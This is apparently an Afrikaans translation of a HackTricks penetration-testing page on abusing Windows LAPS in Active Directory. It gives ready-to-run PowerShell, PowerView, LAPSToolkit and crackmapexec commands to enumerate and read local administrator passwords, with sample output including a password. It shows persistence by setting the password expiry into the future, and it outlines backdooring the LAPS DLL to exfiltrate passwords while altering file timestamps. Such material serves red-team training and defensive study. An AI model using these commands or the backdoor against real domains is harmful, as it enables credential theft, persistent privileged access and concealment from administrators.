Werk jy by 'n cybersekuriteitsmaatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat? Kyk na die INSKRYWINGSPLANNE!
Local Administrator Password Solution (LAPS) is 'n instrument wat gebruik word vir die bestuur van 'n stelsel waar administrateurs wagwoorde, wat uniek, willekeurig en gereeld verander is, toegepas word op domein-gekoppelde rekenaars. Hierdie wagwoorde word veilig binne Active Directory gestoor en is slegs toeganklik vir gebruikers wat toestemming gekry het deur middel van Toegangsbeheerlyste (ACL's). Die veiligheid van die wagwoord-oordragte van die kliënt na die bediener word verseker deur die gebruik van Kerberos-weergawe 5 en Advanced Encryption Standard (AES).
In die domein se rekenaarvoorwerpe, lei die implementering van LAPS tot die byvoeging van twee nuwe eienskappe: ms-mcs-AdmPwd en ms-mcs-AdmPwdExpirationTime. Hierdie eienskappe stoor onderskeidelik die plain-text-administrateurwagwoord en die vervaldatum daarvan.
Kontroleer of geaktiveer is
regquery"HKLM\Software\Policies\Microsoft Services\AdmPwd"/vAdmPwdEnableddir"C:\Program Files\LAPS\CSE"# Check if that folder exists and contains AdmPwd.dll# Find GPOs that have "LAPS" or some other descriptive term in the nameGet-DomainGPO|?{ $_.DisplayName-like"*laps*"}|select DisplayName, Name, GPCFileSysPath |fl# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
LAPS Wagwoord Toegang
Jy kan die rofweg LAPS beleid aflaai vanaf \\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol en dan die Parse-PolFile van die GPRegistryPolicyParser pakkie kan gebruik word om hierdie lêer na 'n mens-leesbare formaat te omskep.
Verder kan die inheemse LAPS PowerShell cmdlets gebruik word as hulle op 'n masjien geïnstalleer is waarop ons toegang het:
Get-Command*AdmPwd*CommandType Name Version Source----------------------------Cmdlet Find-AdmPwdExtendedRights5.0.0.0 AdmPwd.PSCmdlet Get-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Reset-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdAuditing5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdComputerSelfPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdReadPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdResetPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Update-AdmPwdADSchema5.0.0.0 AdmPwd.PS# List who can read LAPS password of the given OUFind-AdmPwdExtendedRights-Identity Workstations | fl# Read the passwordGet-AdmPwdPassword-ComputerName wkstn-2| fl
PowerView kan ook gebruik word om uit te vind wie die wagwoord kan lees en dit kan lees:
# Find the principals that have ReadPropery on ms-Mcs-AdmPwdGet-AdmPwdPassword-ComputerName wkstn-2| fl# Read the passwordGet-DomainObject-Identity wkstn-2-Properties ms-Mcs-AdmPwd
LAPSToolkit
Die LAPSToolkit fasiliteer die opname van LAPS met verskeie funksies. Een daarvan is die ontleding van ExtendedRights vir alle rekenaars met LAPS wat geaktiveer is. Dit sal groepe spesifiek wys wat gedelegeer is om LAPS-wagwoorde te lees, wat dikwels gebruikers in beskermde groepe is. 'n Rekening wat 'n rekenaar by 'n domein gevoeg het, ontvang Alle Uitgebreide Regte oor daardie gasheer, en hierdie reg gee die rekening die vermoë om wagwoorde te lees. Opname kan 'n gebruikersrekening wys wat die LAPS-wagwoord op 'n gasheer kan lees. Dit kan ons help om spesifieke AD-gebruikers te teiken wat LAPS-wagwoorde kan lees.
# Get groups that can read passwordsFind-LAPSDelegatedGroupsOrgUnit Delegated Groups-----------------------OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain AdminsOU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin# Checks the rights on each computer with LAPS enabled for any groups# with read access and users with "All Extended Rights"Find-AdmPwdExtendedRightsComputerName Identity Reason--------------------------MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins DelegatedMSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated# Get computers with LAPS enabled, expirations time and the password (if you have access)Get-LAPSComputersComputerName Password Expiration------------------------------DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf%12/10/202213:24:41
Dumping LAPS-wagwoorde met Crackmapexec
Indien daar geen toegang tot 'n Powershell is nie, kan jy hierdie voorreg afstandbeheer misbruik deur LDAP te gebruik.
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
LAPS Volharding
Vervaldatum
Sodra admin, is dit moontlik om die wagwoorde te bekom en te voorkom dat 'n masjien sy wagwoord opdateer deur die vervaldatum in die toekoms in te stel.
# Get expiration timeGet-DomainObject-Identity computer-21-Properties ms-mcs-admpwdexpirationtime# Change expiration time## It's needed SYSTEM on the computerSet-DomainObject-Identity wkstn-2-Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
Die wagwoord sal steeds herstel word as 'n admin die Reset-AdmPwdPassword cmdlet gebruik; of as Moenie toelaat dat die wagwoordvervaltyd langer as vereis deur beleid geaktiveer is in die LAPS GPO.
Agterdeur
Die oorspronklike bronkode vir LAPS kan gevind word hier, daarom is dit moontlik om 'n agterdeur in die kode te plaas (binne die Get-AdmPwdPassword metode in Main/AdmPwd.PS/Main.cs byvoorbeeld) wat op een of ander manier nuwe wagwoorde eksfiltreer ofêrens stoor.
Kompilieer dan net die nuwe AdmPwd.PS.dll en laai dit op na die masjien in C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll (en verander die wysigingstyd).
Werk jy in 'n cybersekuriteitsmaatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF? Kyk na die INSKRYWINGSPLANNE!
